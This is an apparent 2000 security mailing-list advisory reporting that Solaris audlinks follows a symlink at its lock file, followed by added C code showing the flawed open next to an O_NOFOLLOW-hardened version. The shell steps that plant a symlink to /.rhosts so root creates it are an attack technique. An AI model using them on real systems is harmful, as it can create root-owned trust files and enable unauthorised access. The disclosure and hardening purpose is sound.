Subject: (no subject)
From: SECURITYFOCUS.COM
Date: Thu Dec 28 2000 - 16:34:50 CST
/usr/sbin/audlinks has the following behavior:
$ id
uid=100(optyx) gid=1(other)
$ mkdir -p /tmp/b/dev
$ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
$ su root
Password:
# /usr/sbin/audlinks -r /tmp/b
# ls -l /.rhosts
-rw-r--r-- 1 root other 4 Dec 28 14:28 /.rhosts
truss output snippet:
open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4
this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to set the link then root has to run the program, but)
-Optyx, Uberhax0r Communications
http://www.uberhax0r.net
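
The behaviour reported above, as an added example that is not part of the original post and is not audlinks code: a lock-file open with the same flags as the truss line, next to a variant that refuses a symlink at the lock path. The function names, the temporary directory and the use of O_NOFOLLOW (POSIX.1-2008) are assumptions of this example.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Same flags as the truss line: follows a symlink planted at `path`. */
int open_lock_follow(const char *path) {
    return open(path, O_RDWR | O_CREAT, 0644);
}

/* Hardened variant: refuse a symlink in the final path component, then check
 * that the opened object is a regular, singly linked file owned by the caller. */
int open_lock_safe(const char *path) {
    struct stat st;
    int fd = open(path, O_RDWR | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;                  /* ELOOP when path is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp dir: the lock path is a symlink to a
 * file that does not exist yet. Result bits: 1 = safe open refused with ELOOP,
 * 2 = target still absent after that, 4 = following open created the target. */
int demo(void) {
    char dir[] = "/tmp/locktestXXXXXX", lock[64], target[64];
    struct stat st;
    int fd, result = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(lock, sizeof lock, "%s/.lock", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lock) != 0) return -1;
    fd = open_lock_safe(lock);
    if (fd < 0 && errno == ELOOP) result |= 1;
    if (lstat(target, &st) != 0) result |= 2;
    fd = open_lock_follow(lock);
    if (fd >= 0 && lstat(target, &st) == 0) result |= 4;
    if (fd >= 0) close(fd);
    unlink(target); unlink(lock); rmdir(dir);
    return result;
}

int main(void) { int r = demo(); printf("demo() = %d\n", r); return r == 7 ? 0 : 1; }
```

O_NOFOLLOW only covers the last path component; a caller that takes its root directory from an argument, as with -r here, also has to consider who owns the directories above the lock file.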